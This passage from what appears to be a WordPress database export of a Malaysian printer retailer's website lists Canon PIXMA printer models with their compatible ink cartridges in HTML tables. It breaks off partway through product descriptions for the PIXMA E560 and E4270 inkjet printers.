(Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP180</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP228</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP237</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP245</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP258</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP276</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    </tbody>\n  </table><table width=\"378\" border=\"1\" cellpadding=\"10\">\n  <tbody>\n    <tr>\n      <td width=\"170\"><strong>Model</strong></td>\n      <td width=\"170\"><strong>Cartridge / Bottle</strong></td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP287</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"3\" align=\"center\">PIXMA MP460</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP476</td>\n      <td>CL-41 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-831 (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-40 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-40/CL-41 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-830 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP486</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP496</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"6\" align=\"center\">PIXMA MP497</td>\n      <td>CL-811 (Colour)</td>\n    </tr>\n    <tr>\n      <td>CL-811XL (Colour)</td>\n    </tr>\n    <tr>\n      <td>PG-810 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td>PG-810 Twin Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810/CL-811 Value Pack</td>\n    </tr>\n    <tr>\n      <td>PG-810XL (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP500</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"4\" align=\"center\">PIXMA MP520</td>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP530</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP568</td>\n      <td>CLI-821 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-821 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-820 (Pigment Black)</td>\n    </tr>\n    <tr>\n      <td rowspan=\"5\" align=\"center\">PIXMA MP600</td>\n      <td>CLI-8 (Black)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Cyan)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Magenta)</td>\n    </tr>\n    <tr>\n      <td>CLI-8 (Yellow)</td>\n    </tr>\n    <tr>\n      <td>PGI-5 (Pigment Black)</td>\n    </tr>\n  </tbody>\n</table>\n<table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MP610</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP628</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP638</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP648</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP800R</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP810</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP830</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP970</p></td><td width=\"208\"><p>CLI-8 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-8 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-5 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP988</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MP996</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA MX308</p></td><td width=\"208\"><p>CL-41 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-831 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-40/CL-41 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-830 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX328</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX338</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX347</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX366</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX426</p></td><td width=\"208\"><p>CL-811 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-811XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810 Twin Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810/CL-811 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-810XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX876</p></td><td width=\"208\"><p>CLI-821 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-821 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-820 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA MX886</p></td><td width=\"208\"><p>CLI-726 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-726 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-725 (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-1</p></td><td width=\"208\"><p>PGI-29 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Dark Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-29 (Yellow)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-10</p></td><td width=\"208\"><p>PGI-72 (Chroma Optimizer)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Matte Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Red)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-72 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA PRO-100</p></td><td width=\"208\"><p>CLI-42 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Light Gray)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Photo Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-42 (Yellow)</p></td></tr><tr><td width=\"170\"><p>PIXMA TR8570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS207</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS307</p></td><td width=\"208\"><p>CL-746 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746S (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-746XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745S (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-745XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5070</p></td><td width=\"208\"><p>CLI-771 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-771XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-770XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS5170</p></td><td width=\"208\"><p>CL-741 (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CL-741XL (Colour)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740/CL-741 Value Pack</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PG-740XL (Pigment Black)</p></td></tr></tbody></table><table width=\"378\"><tbody><tr><td width=\"170\"><p><strong>Model</strong></p></td><td width=\"208\"><p><strong>Cartridge / Bottle</strong></p></td></tr><tr><td width=\"170\"><p>PIXMA TS8270</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9170</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Photo Blue)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr><tr><td width=\"170\"><p>PIXMA TS9570</p></td><td width=\"208\"><p>CLI-781 (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781 (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Cyan)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Magenta)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>CLI-781XL (Yellow)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780 (Pigment Black)</p></td></tr><tr><td width=\"170\">Â </td><td width=\"208\"><p>PGI-780XL (Pigment Black)</p></td></tr></tbody></table>','Canon','','inherit','closed','closed','','1449-revision-v1','','','2019-09-25 10:04:57','2019-09-25 02:04:57','',1449,'https://bintara.com.my/blog/2019/09/25/1449-revision-v1/',0,'revision','',0),(3327,1,'2019-09-25 10:05:30','2019-09-25 02:05:30','<h2>Injet Printers :-</h2>		\n			<h4>PIXMA E560 / E560R</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2.png 362w, https://bintara.com.my/wp-content/uploads/2018/12/e2f221acba7b4ca795be93654fafca7b_PIXMAE560_2-300x265.png 300w\" sizes=\"(max-width: 362px) 100vw, 362px\" />											\n		<p>Advanced Wireless All-In-One with Auto DuplexÂ Printing for Low-Cost Printing</p><p>The Ink Efficient E560 / E560R is designed to give you an affordable wireless printing experience at low running cost of up to 800 pages.</p><p>Available in Black and Red.</p><p>Print, Scan, Copy</p><p>ISO Standard print speed (A4): up to 9.9ipm black / 5.7ipm colour</p><p>Hi-speed USB 2.0, WiFi</p><p>Recommended print volume: 80 - 400 pages</p><center>[maxbutton id=\"11\" ]</center>		\n			<h4>PIXMA E4270</h4>		\n										<img width=\"362\" height=\"320\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/d6c6807e1827411dade7426d7b93df91_E42XX_AS_FR_op3_blk_en-v1.png\" 